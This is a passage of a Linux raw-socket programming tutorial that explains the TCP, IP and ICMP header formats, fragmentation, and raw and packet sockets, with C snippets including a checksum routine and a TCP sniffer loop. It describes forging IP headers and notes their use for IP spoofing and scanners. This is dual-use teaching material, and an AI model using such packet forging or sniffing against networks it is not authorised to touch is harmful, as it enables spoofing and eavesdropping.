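#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: one's-complement sum of 16-bit big-endian words, */
/* complemented at the end. An odd trailing byte is padded with a zero.  */
uint16_t inet_checksum(const void *data, size_t len)
{
    const uint8_t *p = data;
    uint32_t sum = 0;

    while (len > 1) {
        sum += (uint32_t)((p[0] << 8) | p[1]);
        p += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (uint32_t)(p[0] << 8); /* pad the last byte on the right */

    /* Fold the carries back into the low 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);

    return (uint16_t)~sum;
}
```

A receiver can run the same function over the data with the transmitted checksum included. If nothing was damaged, the result is 0.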
TCP provides reliability with a mechanism called Positive Acknowledgement with Retransmission (PAR). Simply said, a system using PAR resends the data unless it hears from the remote system that the data was received correctly. The unit of data exchanged between co-operating TCP modules is called a segment. The following is the TCP segment format.

Figure 15: The segment format of the TCP Protocol.

A brief field description:

Field: Description

Source Port (16 bits): Specifies the port on the sending TCP module.
Destination Port (16 bits): Specifies the port on the receiving TCP module.
Sequence Number (32 bits): Specifies the sequence position of the first data octet in the segment. When the segment opens a connection, the sequence number is the Initial Sequence Number (ISN) and the first octet in the data field is at sequence number ISN+1.
Acknowledgement Number (32 bits): Specifies the next sequence number that is expected by the sender of the segment. TCP indicates that this field is active by setting the ACK bit, which is always set after a connection is established.
Data Offset (4 bits): Specifies the number of 32-bit words in the TCP header.
Reserved (6 bits): Must be zero. Reserved for future use.
Control Bits (6 bits): The six control bits are as follows:
    1. URG - When set, the Urgent Pointer field is significant.
    2. ACK - When set, the Acknowledgement Number field is significant.
    3. PSH - Initiates a push function.
    4. RST - Forces a reset of the connection.
    5. SYN - Synchronizes sequencing counters for the connection. This bit is set when a segment requests the opening of a connection.
    6. FIN - No more data. Closes the connection.
Window (16 bits): Specifies the number of octets, starting with the octet specified in the acknowledgement number field, which the sender of the segment can currently accept.
Checksum (16 bits): An error control checksum that covers the header and data fields. It does not cover any padding required to ensure that the segment consists of an even number of octets. The checksum also covers a 96-bit pseudoheader as shown below; it includes source and destination addresses, the protocol, and the segment length. The information is forwarded with the segment to IP to protect TCP from misrouted segments. The value of the segment length field includes the TCP header and data, but doesn't include the length of the pseudoheader.
Urgent Pointer (16 bits): Identifies the sequence number of the octet following urgent data. The urgent pointer is a positive offset from the sequence number of the segment.
Options (variable): Options are available for a variety of functions.
Padding (variable): 0-value octets are appended to the header to ensure that the header ends on a 32-bit word boundary.

Table 5: TCP segment fields description.
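The field layout in Table 5 can be made concrete with a small decoder for the fixed 20-byte part of a TCP header. This is a minimal sketch: the names tcp_fields, TCPF_* and parse_tcp_header() are made up for illustration, and it assumes the classic RFC 793 layout, where the data offset is the high 4 bits of byte 12 and the six control bits are the low 6 bits of byte 13.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical masks for the six control bits of Table 5. */
enum {
    TCPF_FIN = 0x01, TCPF_SYN = 0x02, TCPF_RST = 0x04,
    TCPF_PSH = 0x08, TCPF_ACK = 0x10, TCPF_URG = 0x20
};

/* Hypothetical container for the decoded fields (host byte order). */
struct tcp_fields {
    uint16_t src_port, dst_port;
    uint32_t seq, ack;
    unsigned header_len;              /* data offset converted to bytes */
    uint8_t  flags;                   /* combination of TCPF_* bits */
    uint16_t window;
};

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Hypothetical helper: decode the TCP header at the start of seg. */
/* Returns 0 on success, -1 if the buffer or data offset is invalid. */
int parse_tcp_header(const uint8_t *seg, size_t len, struct tcp_fields *out)
{
    if (len < 20)
        return -1;                    /* minimum header without options */

    out->src_port   = be16(seg);
    out->dst_port   = be16(seg + 2);
    out->seq        = be32(seg + 4);
    out->ack        = be32(seg + 8);
    out->header_len = (unsigned)(seg[12] >> 4) * 4;  /* 32-bit words to bytes */
    out->flags      = seg[13] & 0x3F;
    out->window     = be16(seg + 14);

    if (out->header_len < 20 || out->header_len > len)
        return -1;
    return 0;
}
```

For a segment that opens a connection, flags & TCPF_SYN is non-zero and the seq field holds the ISN.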

Figure 16: The format of the TCP pseudoheader.

TCP Three-Way Handshake

Each segment contains a checksum that the recipient uses to verify that the data is undamaged. If the data segment is received undamaged, the receiver sends a positive acknowledgement back to the sender. If the data segment is damaged, the receiver discards it. After an appropriate time-out period, the sending TCP module retransmits any segment for which no positive acknowledgement has been received.

TCP is connection-oriented. It establishes a logical end-to-end connection between the two communicating hosts. Control information, called a handshake, is exchanged between the two endpoints to establish a dialogue before data is transmitted. TCP indicates the control function of a segment by setting the appropriate bit in the flags field of the segment header. The type of handshake used by TCP is called a three-way handshake because three segments are exchanged. The following figure illustrates the three-way handshake mechanism.

Figure 17: A Three-Way Handshake of the TCP initialization.

The client that needs to initialize a connection sends out a SYN (Synchronize) segment to the server along with its initial sequence number. No data is sent during this process, and the SYN segment contains only the TCP header and IP header. When the server receives the SYN segment, it acknowledges the request with its own SYN segment, called the SYN-ACK segment. When the client receives the SYN-ACK, it sends an ACK for the server's SYN. At this stage the connection is "established."

Unlike TCP connection initialization, which is a three-way process, connection termination takes place with the exchange of four segments. The following figure illustrates the TCP termination process.

Figure 18: A Four-Way of the TCP termination.

The client that needs to terminate the connection sends a FIN segment to the server, that is, a TCP segment with the FIN flag set, indicating that it has finished sending data. The server, upon receiving the FIN segment, does not terminate the connection but enters the "passive close" (CLOSE_WAIT) state and sends an ACK for the FIN back to the client, with the acknowledgement number set to the FIN's sequence number incremented by one. When the server has no more data to send, it sends its own FIN segment and enters the LAST_ACK state. When the client gets the FIN from the server, it enters the TIME_WAIT state and sends an ACK back to the server, again acknowledging the FIN's sequence number incremented by one. When the server gets the ACK from the client, it closes the connection.
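The termination sequence can be followed more easily as a small state table. The following is only a simplified sketch based on the standard TCP state diagram of RFC 793. The enum and function names are made up for illustration. It also uses the FIN_WAIT_1 and FIN_WAIT_2 states of the closing side, which the text above does not name, and it leaves out the simultaneous-close case.

```c
#include <assert.h>

/* Simplified subset of the TCP states involved in closing a connection. */
enum tcp_state {
    ST_ESTABLISHED, ST_FIN_WAIT_1, ST_FIN_WAIT_2, ST_TIME_WAIT,
    ST_CLOSE_WAIT, ST_LAST_ACK, ST_CLOSED
};

/* Events that drive the close: local close(), segments received, timer. */
enum tcp_event { EV_APP_CLOSE, EV_RECV_FIN, EV_RECV_ACK, EV_TIMEOUT };

/* Hypothetical helper: return the state that follows s when ev happens. */
/* Combinations that are not part of the normal close leave s unchanged. */
enum tcp_state next_state(enum tcp_state s, enum tcp_event ev)
{
    switch (s) {
    case ST_ESTABLISHED:
        if (ev == EV_APP_CLOSE) return ST_FIN_WAIT_1;  /* we send FIN */
        if (ev == EV_RECV_FIN)  return ST_CLOSE_WAIT;  /* we ACK the peer's FIN */
        break;
    case ST_FIN_WAIT_1:
        if (ev == EV_RECV_ACK)  return ST_FIN_WAIT_2;  /* our FIN was ACKed */
        break;
    case ST_FIN_WAIT_2:
        if (ev == EV_RECV_FIN)  return ST_TIME_WAIT;   /* we ACK the peer's FIN */
        break;
    case ST_CLOSE_WAIT:
        if (ev == EV_APP_CLOSE) return ST_LAST_ACK;    /* we send our own FIN */
        break;
    case ST_LAST_ACK:
        if (ev == EV_RECV_ACK)  return ST_CLOSED;      /* peer ACKed our FIN */
        break;
    case ST_TIME_WAIT:
        if (ev == EV_TIMEOUT)   return ST_CLOSED;      /* wait period is over */
        break;
    default:
        break;
    }
    return s;
}
```

The client in Figure 18 walks the path ESTABLISHED, FIN_WAIT_1, FIN_WAIT_2, TIME_WAIT, CLOSED, while the server walks ESTABLISHED, CLOSE_WAIT, LAST_ACK, CLOSED.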

Reliability and Acknowledgement TCP employs the positive acknowledgement with retransmission technique for the purpose of achieving reliability in service.

Figure 19: The positive acknowledgement with retransmission technique.

Figure 19 illustrates a simple ladder diagram depicting the events taking place between two hosts. The arrows represent transmitted data and/or acknowledgements, and time is represented by the vertical distance down the ladder. When TCP sends a data segment, it requires an acknowledgement from the receiving end. The acknowledgement is used to update the connection state table. An acknowledgement can be positive or negative. A positive acknowledgement implies that the receiving host received the data and that it passed the integrity check. A negative acknowledgement implies that the failed data segment needs to be retransmitted. Such a failure can be caused by data corruption or loss. TCP itself sends only positive acknowledgements; the absence of one before the retransmission timer expires plays the role of the negative acknowledgement.

Figure 20: TCP implementation of the time-out mechanism to keep track of lost segments.

Figure 20 illustrates what happens when a packet is lost on the network and fails to reach its ultimate destination. When a host sends data, it starts a countdown timer. If the timer expires without an acknowledgement being received, the host assumes that the data segment was lost. Consequently, the host retransmits a copy of the lost segment. TCP keeps a copy of all transmitted data that has not yet been positively acknowledged. Only after receiving the positive acknowledgement is this copy discarded to make room for other data in its buffer.

Data Stream Maintenance

The interface between TCP and a local process is a port, which is a mechanism that enables the process to call TCP and in turn enables TCP to deliver data streams to the appropriate process. Ports are identified by port numbers. To fully specify a connection, the host IP address is combined with the port number. This combination of IP address and port number is called a socket. A given socket number is unique on the internetwork. A connection between two hosts is fully described by the sockets assigned to each end of the connection.

Figure 21: A TCP data stream that starts with an Initial Sequence Number (ISN) of 0.

In figure 21, the receiving system has received and acknowledged 2000 bytes, so the current Acknowledgement Number is 2000. The receiver also has enough buffer space for another 6000 bytes, so it has advertised a Window of 6000. The sender is currently sending a segment of 1000 bytes starting with Sequence Number 4001. The sender has received no acknowledgement for the bytes from 2001 on, but continues sending data as long as it is within the window. If the sender fills the window and receives no acknowledgement of the data previously sent, it will, after an appropriate time-out, resend the data starting from the first unacknowledged byte. Retransmission would start from byte 2001 if no further acknowledgements are received. This procedure ensures that data is reliably received at the far end of the network.

From the perspective of applications, communication with the network involves sending and receiving continuous streams of data. The application is not responsible for fragmenting the data to fit lower-layer protocols. The whole process can be illustrated in the following figure.

Figure 22: How data is processed as it travels down the protocol stack, through the network, and up the protocol stack of the receiver.

Brief description:

1. TCP receives a stream of data from the upper-layer process.
2. TCP may fragment the data stream into segments that meet the maximum datagram size of IP.
3. IP may fragment segments as it prepares datagrams that are sized to conform to the restrictions of the network type: Ethernet, Token Ring etc.
4. Network protocols transmit the datagram in the form of bits.
5. Network protocols at the receiving host reconstruct datagrams from the bits they receive.
6. IP receives datagrams from the network. Where necessary, datagram fragments are reassembled to reconstruct the original segment.
7. TCP reassembles the segments and presents the data to upper-layer protocols in the form of data streams.

Application Layer

The Application layer includes all processes that use the transport layer protocols to deliver data. There are many application protocols. A good example of the concerns handled by these processes is the reconciliation of differences in data syntax between the platforms on which the applications are running. Unless this difference in data representation is handled properly, any exchange of data involving these processes is likely to yield erroneous interpretations of numerical data. To resolve this issue, and other similar issues, TCP/IP defines the eXternal Data Representation (XDR) protocol. Reflecting on the nature of this problem, you can easily see that it has nothing to do with the underlying network topology, wiring, or electrical interference.

Application examples that use TCP:

1. TELNET: The Network Terminal Protocol provides remote login over the network.
2. FTP: The File Transfer Protocol is used for interactive file transfer between hosts.
3. SMTP: The Simple Mail Transfer Protocol is used by Mail Transfer Agents (MTAs) to deliver electronic mail.

Application examples that use UDP:

1. SNMP: The Simple Network Management Protocol is used to collect management information from network devices.
2. DNS: Domain Name Service maps IP addresses to the names assigned to network devices.
3. RIP: Routing Information Protocol. Routing is central to the way TCP/IP works, and RIP is used by network devices to exchange routing information.
4. NFS: Network File System. This protocol allows files to be shared by various hosts on the network as if they were local drives.

RAW vs Cooked Socket Intro

In this section and the ones that follow, we will learn the basics of using raw sockets. Here, we will try to construct our own packet and insert any IP protocol based datagram into the network traffic. This is useful, for example, to build raw socket scanners like nmap, to spoof, or to perform operations that need to send out raw packets. Basically, you can send any packet at any time, whereas with the interface functions of your system's IP stack (connect(), write(), bind(), etc.) discussed in the previous Modules you don't have direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to any valid connection). A raw socket is used to send a single packet at a time, with all the protocol headers filled in by the program (instead of the kernel).
As discussed in the previous Modules, when you create a socket and bind it to a process/port, you don't care about IP or TCP header fields as long as you are able to communicate with the server. The kernel or the underlying operating system builds the packet, including the checksum, for your data. Thus, network programming is easy with the traditional cooked sockets. In contrast, raw sockets let you fabricate the header fields, including information such as the source IP address. The following is the socket() prototype.

    int socket(int domain, int type, int protocol);

If you check the man page for socket(), the socket types defined for the type parameter include:

Type: Description

SOCK_STREAM: Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmission mechanism may be supported.
SOCK_DGRAM: Supports datagrams (connectionless, unreliable messages of a fixed maximum length).
SOCK_SEQPACKET: Provides a sequenced, reliable, two-way connection-based data transmission path for datagrams of fixed maximum length; a consumer is required to read an entire packet with each read system call.
SOCK_RAW: Provides raw network protocol access.
SOCK_RDM: Provides a reliable datagram layer that does not guarantee ordering.
SOCK_PACKET: Obsolete and should not be used in new programs. Use packet (check the man page for packet) instead.

Table 6: Socket types of socket().

There are two methods of receiving packets from the datalink layer under Linux. The original method, which is more widely available but less flexible and now obsolete, is to create a socket of type SOCK_PACKET. The newer method, which introduces more filtering and performance features, is to create a socket of family PF_PACKET. To do either, we must have sufficient privileges (similar to creating a raw socket), and the third argument to socket() must be a nonzero value specifying the Ethernet frame type (other frame types such as Token Ring may also be used). When using PF_PACKET sockets, the second argument to socket() can be SOCK_DGRAM, for "cooked" packets with the link-layer header removed, or SOCK_RAW, for the complete link-layer packet. SOCK_PACKET sockets only return the complete link-layer packet. For example, to receive all frames from the datalink, we may write:

    /* newer systems */
    fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

Or

    /* older systems */
    fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));

This would return frames for all protocols that the datalink receives. If we want only IPv4 frames, the call would be:

    /* newer systems */
    fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP));

Or

    /* older systems */
    fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP));

Other constants for the final argument are ETH_P_ARP and ETH_P_IPV6, for example. The constants for the domain parameter are listed below.
In the previous Modules we used only AF_INET.

Name: Purpose

PF_UNIX, PF_LOCAL: Local communication.
PF_INET: IPv4 Internet protocols.
PF_INET6: IPv6 Internet protocols.
PF_IPX: IPX - Novell protocols.
PF_NETLINK: Kernel user interface device.
PF_X25: ITU-T X.25 / ISO-8208 protocol.
PF_AX25: Amateur radio AX.25 protocol.
PF_ATMPVC: Access to raw ATM PVCs.
PF_APPLETALK: Appletalk.
PF_PACKET: Low level packet interface.

Table 7: Domain parameters of socket().

The protocol parameter specifies a particular protocol number to be used with the socket. Normally only a single protocol exists to support a particular socket type within a given protocol family, in which case protocol can be specified as 0 (as used in the program examples in previous Modules). However, it is possible that many protocols exist, in which case a particular protocol must be specified. The protocol number to use is specific to the communication domain. A partial list of the protocol numbers has been discussed in the IPv4 Datagram Format section (or you can check the getprotobyname() man page or RFC 1700 for a complete list). To map protocol name strings to protocol numbers you may use the getprotobyname() function (see also getprotoent()).

In the previous Modules we have already become familiar with SOCK_STREAM and SOCK_DGRAM. In this section, we'll be using SOCK_RAW, which includes the IP headers (and all subsequent protocol headers of the upper layer as needed) and data. In the previous program examples we used SOCK_STREAM (TCP/connection oriented) and SOCK_DGRAM (UDP/connectionless) sockets as shown below:

    socket(AF_INET, SOCK_STREAM, 0);

And

    socket(AF_INET, SOCK_DGRAM, 0);

For a raw socket we code as follows:

    #include <sys/socket.h>
    #include <netinet/in.h>

    socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
    socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);

Depending on what you want to send, you initially open a socket and give it its type. For example:

    sockd = socket(AF_INET, SOCK_RAW, <protocol>);

For the <protocol>, you can choose any protocol number, including IPPROTO_RAW. The protocol number goes into the IP header verbatim. With IPPROTO_RAW, the protocol field is taken from the IP header that your program supplies. A socket option, IP_HDRINCL, allows you to include your own IP header along with the rest of the packet.
Then, you might use it as:

    int on = 1;   /* the option value is an int */
    setsockopt(sockd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));

You then build the packet and use a normal sendto(), recvfrom() etc. The Internet IPv4 layer generates an IP header when sending a packet unless the IP_HDRINCL socket option is enabled on the socket. When it is enabled, the packet must contain an IP header that you build in your program. Only processes with an effective user id of 0 (root) or the CAP_NET_RAW capability are allowed to open raw sockets. A protocol of IPPROTO_RAW implies that IP_HDRINCL is enabled. For this case, the following is a summary of the IP header fields that are modified on sending.

IP header field: Modified on sending by IP_HDRINCL

IP Checksum: Always filled in.
Source Address: Filled in when zero.
Packet Id: Filled in when zero.
Total Length: Always filled in.

Table 8: Some IP header default values.

If IP_HDRINCL is specified and the IP header has a non-zero destination address then the destination address of the socket is used to route the packet. When MSG_DONTROUTE is specified the destination address should refer to a local interface, otherwise a routing table lookup is done anyway but gatewayed routes are ignored. If IP_HDRINCL isn't set then IP header options can be set on raw sockets with setsockopt() as shown before. Raw sockets are usually only needed for new protocols or protocols with no user interface (like ICMP).

When a packet is received, it is passed to any raw sockets which have been bound to its protocol before it is passed to other protocol handlers (e.g. kernel protocol modules). Raw sockets use the standard sockaddr_in address structure defined in <netinet/in.h> (see the ip man page). For example:

    ...
    struct sockaddr_in sin;
    ...
    // Address family
    sin.sin_family = AF_INET;
    // Port number, in network byte order
    sin.sin_port = htons(srcportnum);
    // IP address
    sin.sin_addr.s_addr = inet_addr(argv[1]);

Raw socket options can be set with setsockopt() and read with getsockopt() by passing the SOL_RAW family flag. Raw sockets fragment a packet when its total length exceeds the interface Maximum Transmission Unit (MTU). A raw socket can be bound to a specific local address using the bind() call. If it isn't bound, all packets with the specified IP protocol are received. In addition, a raw socket can be bound to a specific network device using SO_BINDTODEVICE (check the socket man page in section 7). An IPPROTO_RAW socket is send only.

If you really want to receive all IP packets, use a packet socket (see the packet man page) with the ETH_P_IP protocol. Note that packet sockets don't reassemble IP fragments, unlike raw sockets. If you want to receive all ICMP packets for a datagram socket, it is often better to use IP_RECVERR on that particular socket.

Raw sockets may tap all IP protocols in Linux, even protocols like ICMP or TCP which have a protocol module in the kernel. In this case the packets are passed to both the kernel module and the raw socket(s).

Maximum Transmission Unit (MTU)

The Maximum Transmission Unit (MTU) specifies the maximum transmission unit size of an interface. Each interface used by TCP/IP may have a different MTU value specified. The MTU is usually determined through negotiation with the lower-level driver and by using that lower-level driver value. However, that value may be overridden. Each media type (Ethernet, FDDI, Token Ring etc.) has a maximum frame size that cannot be exceeded. The link layer is responsible for discovering this MTU and reporting it to the protocols above the link layer. Network Driver Interface Specification (NDIS) drivers may be queried for the local MTU by the protocol stack. Knowledge of the MTU for an interface is used by upper-layer protocols, such as TCP, which automatically optimizes packet sizes for each medium.

From the moment the raw socket is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 6 for TCP, 17 for UDP and 1 for ICMP). With this knowledge, we can, for example, create a small sniffer program as shown in the following code portion that dumps out the contents of all TCP packets we receive and prints out the payload, the data of the session/application layer etc.

    int fd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    /* single packets are usually not bigger than 8192 bytes but depend on the
       media standard of the Network Access layer such as Ethernet, Token Ring etc */
    ...
    char buffer[8192];
    ssize_t n;
    struct ipheader *ip = (struct ipheader *) buffer;
    struct tcpheader *tcp = (struct tcpheader *) (buffer + sizeof(struct ipheader));
    ...
    /* one byte is left free so that the data can be terminated before printing */
    while ((n = read(fd, buffer, sizeof(buffer) - 1)) > 0) {
        buffer[n] = '\0';
        /* packet = ip header + tcp header + data */
        /* Little Endian/Big Endian must be considered here */
        printf("Dump the packet: %s\n", buffer + sizeof(struct ipheader) + sizeof(struct tcpheader));
    }

LINUX SOCKET PART 16
Advanced TCP/IP - The TCP/IP Protocols Details


This is a continuation of the Part IV series, Advanced TCP/IP Programming Tutorial. Working program examples, if any, were compiled using gcc, tested using public IPs, and run on Fedora Core 3 with several rounds of updates, as root or SUID 0. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration. This Module concentrates on the TCP/IP stack and tries to dig deeper, down to the packet level.

The protocols: IP, ICMP, UDP and TCP

To fabricate our own packets, all we need to know is the structure of the protocol headers that need to be included. We can define our own protocol structure (packet header) and assign it new values, or we can just assign new values to the elements of the standard built-in structures. Below you will find detailed information on the IP, ICMP, UDP and TCP headers. Unix/Linux systems provide standard structures for these headers in their header files, so fabricating our own packet by using a struct is a very useful way of learning and understanding packets, and it gives us flexibility in filling the packet headers. We can always create our own struct, as long as the length of each field is correct. In building our program later on, note also the difference between little endian machines (Intel x86) and big endian machines (some processor architectures other than Intel x86, such as Motorola). The following sections analyze the header structures that will be used to construct our own packet in the program examples that follow, so that we know what values should be filled in and what they mean. The data types that we need to use are: unsigned char (1 byte/8 bits), unsigned short int (2 bytes/16 bits) and unsigned int (4 bytes/32 bits). Some of the information presented in the following sections might repeat earlier material.

IP

The following figure is the IP header format that will be used as our reference in the following discussion.

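Figure 23: IP header format.

The following is an example structure for the IP header. Here we try to define all the IP header fields.

    struct ipheader {
        unsigned char      iph_ihl:4, iph_ver:4;  /* bit-field order for little endian machines */
        unsigned char      iph_tos;
        unsigned short int iph_len;
        unsigned short int iph_ident;
        unsigned short int iph_offset;            /* 3 flag bits followed by the 13-bit fragment offset */
        unsigned char      iph_ttl;
        unsigned char      iph_protocol;
        unsigned short int iph_chksum;
        unsigned int       iph_source;
        unsigned int       iph_dest;
    };
    /* total ip header length: 20 bytes (= 160 bits) */

The 3-bit flags and the 13-bit fragment offset share one 16-bit word, so they are declared here as a single member. Declaring the flags as a separate unsigned char in front of a 16-bit offset would make the structure longer than the 20-byte header.

The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as TCP or UDP. The following Table is a list of the IP header fields and their information.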

Field: Description

Version: 4 bits, the version of IP currently used; the ip version is 4 (the other version is IPv6).

Header length (IHL): 4 bits, the ip header length in 32-bit words, which points to the beginning of the data. The minimum for a correct header is 5, so a value of 5 for iph_ihl means 20 bytes (5 * 4). Values other than 5 only need to be set if the ip header contains options (mostly used for routing).

Type of service: 8 bits, type of service controls the priority of the packet. 0x00 is normal; the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost). It indicates the quality of service desired by specifying how an upper-layer protocol would like the current datagram handled, and assigns datagrams various levels of importance. This field is used for the assignment of Precedence, Delay, Throughput and Reliability. These parameters are used to guide the selection of the actual service parameters when transmitting a datagram through a particular network. Several networks offer service precedence, which somehow treats high precedence traffic as more important than other traffic (generally by accepting only traffic above a certain precedence at times of high load). The major choice is a three way tradeoff between low-delay, high-reliability, and high-throughput.

    Bits 0-2: Precedence.
        111 - Network Control
        110 - Internetwork Control
        101 - CRITIC/ECP
        100 - Flash Override
        011 - Flash
        010 - Immediate
        001 - Priority
        000 - Routine
    Bit 3: 0 = Normal Delay, 1 = Low Delay.
    Bit 4: 0 = Normal Throughput, 1 = High Throughput.
    Bit 5: 0 = Normal Reliability, 1 = High Reliability.
    Bits 6-7: Reserved for Future Use.

    Bit:    0 1 2        3   4   5   6   7
    Field:  Precedence   D   T   R   0   0

The use of the Delay, Throughput, and Reliability indications may increase the cost (in some sense) of the service. In many networks better performance for one of these parameters is coupled with worse performance on another. Except for very unusual cases, at most two of these three indications should be set. The type of service is used to specify the treatment of the datagram during its transmission through the internet system. The Network Control precedence designation is intended to be used within a network only. The actual use and control of that designation is up to each network. The Internetwork Control designation is intended for use by gateway control originators only. If the actual use of these precedence designations is of concern to a particular network, it is the responsibility of that network to control the access to, and use of, those precedence designations.

Total length: 16 bits; the total length of the ip datagram (ip header and data) in bytes. This includes the ip header, the icmp, tcp or udp header, and the payload. The maximum length that can be specified by this field is 65,535 bytes. Typically, hosts are prepared to accept datagrams of up to 576 bytes (whether they arrive whole or in fragments).

Identification: The iph_ident sequence number is mainly used for reassembly of fragmented IP datagrams. When sending single datagrams, each can have an arbitrary ID. It contains an integer that identifies the current datagram. This field is assigned by the sender to help the receiver assemble the datagram fragments.

Flags: A 3-bit field of which the two low-order (least-significant) bits control fragmentation. The middle bit (DF) specifies whether the packet can be fragmented. The low-order bit (MF) specifies whether the packet is the last fragment in a series of fragmented packets. The third or high-order bit is not used. The Control Flags:

    Bit 0: reserved, must be zero.
    Bit 1: (DF) 0 = May Fragment, 1 = Don't Fragment.
    Bit 2: (MF) 0 = Last Fragment, 1 = More Fragments.

    Bit:    0   1    2
    Field:  0   DF   MF

Fragment offset: The fragment offset is used for reassembly of fragmented datagrams. The first 3 bits of the 16-bit word are the fragment flags: the first is always 0, the second is the do-not-fragment bit (set by iph_offset = 0x4000) and the third is the more-flag or more-fragments-following bit (iph_offset = 0x2000). The following 13 bits are the fragment offset, containing the number of 8-byte blocks already sent. This 13-bit field indicates the position of the fragment's data relative to the beginning of the data in the original datagram, which allows the destination IP process to properly reconstruct the original datagram.

Time to live: 8 bits, time to live is the number of hops (routers to pass) before the packet is discarded and an icmp error message is returned. The maximum is 255. It is a counter that gradually decrements down to zero, at which point the datagram is discarded. This keeps packets from looping endlessly.

Protocol: 8 bits, the transport layer protocol. It can be tcp (6), udp (17), icmp (1), or whatever protocol follows the ip header. Look in /etc/protocols or RFC 1700 for more. It indicates which upper-layer protocol receives incoming packets after IP processing is complete.

Header checksum: 16 bits, a checksum on the header only, not on the whole ip datagram. Every time anything in the header changes, it needs to be recalculated, or the packet will be discarded by the next router. It helps ensure IP header integrity. Since some header fields change, e.g., Time To Live, this is recomputed and verified at each point that the Internet header is processed.

Source address: 32 bits, source IP address. It is converted to long format, e.g. by inet_addr(). Can be chosen arbitrarily (as used in ip spoofing).

Destination address: 32 bits, destination IP address, converted to long format, e.g. by inet_addr(). Can be chosen arbitrarily.

Options: Variable. The options may appear or not in datagrams. They must be implemented by all IP modules (hosts and gateways). What is optional is their transmission in any particular datagram, not their implementation. In some environments the security option may be required in all datagrams. The option field is variable in length. There may be zero or more options.

Padding: Variable. The internet header padding is used to ensure that the internet header ends on a 32 bit boundary. The padding is zero.

Table 9: IP header fields description.

Fragmentation

Fragmentation, transmission and reassembly across a local network which is invisible to the internet protocol (IP) are called intranet fragmentation. Fragmentation of an internet datagram is necessary when it originates in a local network that allows a large packet size and must traverse a local network that limits packets to a smaller size to reach its destination. An internet datagram can be marked "don't fragment". When the internet datagram is marked like that, it is not to be internet fragmented under any circumstances. If an internet datagram that has been marked as "don't fragment" cannot be delivered to its destination without fragmenting it, it will be discarded instead. The internet fragmentation and reassembly procedure needs to be able to break a datagram into an almost arbitrary number of pieces that can be later reassembled.
The receiver of the fragments uses the identification field to ensure that fragments of different datagrams are not mixed. The fragment offset field tells the receiver the position of a fragment in the original datagram. The fragment offset and length determine the portion of the original datagram covered by this fragment. The more-fragments flag indicates (by being reset) the last fragment. These fields provide sufficient information to reassemble datagrams.

The identification field is used to distinguish the fragments of one datagram from another. The originating protocol module of an internet datagram sets the identification field to a value that must be unique for that source-destination pair and protocol for the time the datagram will be active in the internet system. The originating protocol module of a complete datagram sets the more-fragments flag to zero and the fragment offset to zero.

To fragment a long internet datagram, an internet protocol module (for example, in a gateway/router) creates two new internet datagrams and copies the contents of the internet header fields from the long datagram into both new internet headers. The data of the long datagram is divided into two portions on an 8 byte (64 bit) boundary (the second portion might not be an integral multiple of 8 bytes, but the first must be). The number of 8 byte blocks in the first portion is called NFB (for Number of Fragment Blocks). The first portion of the data is placed in the first new internet datagram, and the total length field is set to the length of the first datagram. The more-fragments flag is set to one. The second portion of the data is placed in the second new internet datagram, and the total length field is set to the length of the second datagram. The more-fragments flag carries the same value as in the long datagram. The fragment offset field of the second new internet datagram is set to the value of that field in the long datagram plus NFB. This procedure can be generalized for an n-way split, rather than the two-way split described.

To assemble the fragments of an internet datagram, an internet protocol module (for example at a destination host) combines internet datagrams that all have the same value for the four fields: identification, source, destination, and protocol. The combination is done by placing the data portion of each fragment in the relative position indicated by the fragment offset in that fragment's internet header. The first fragment will have the fragment offset zero, and the last fragment will have the more-fragments flag reset to zero.

ICMP

IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. The Internet Control Message Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered a protocol of the network layer. The following is the ICMP header format.

Figure 24: ICMP header format.

The following example is a structure that tries to define the ICMP header. This structure is defined for the Echo or Echo Reply Message.

    struct icmpheader {
        unsigned char      icmph_type;
        unsigned char      icmph_code;
        unsigned short int icmph_chksum;
        /* The following data structures are ICMP type specific */
        unsigned short int icmph_ident;
        unsigned short int icmph_seqnum;
    };
    /* total ICMP header length: 8 bytes (= 64 bits) */

Messages can be error or informational messages. Error messages can be Destination Unreachable, Packet Too Big, Time Exceeded and Parameter Problem. The possible informational messages are Echo Request, Echo Reply, Group Membership Query, Group Membership Report and Group Membership Reduction. The following Table lists the information for the previous structure elements (the ICMP header fields).

Field: Description

Type: The message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. Look in the include file for all the types.

Code: For each type of message several different codes are defined. An example of this is the Destination Unreachable message, where possible messages are: no route to destination, communication with destination administratively prohibited, not a neighbor, address unreachable, port unreachable. For further details, refer to the standard. This is significant when sending an error message (unreach), and specifies the kind of error. Again, consult the include file for more.

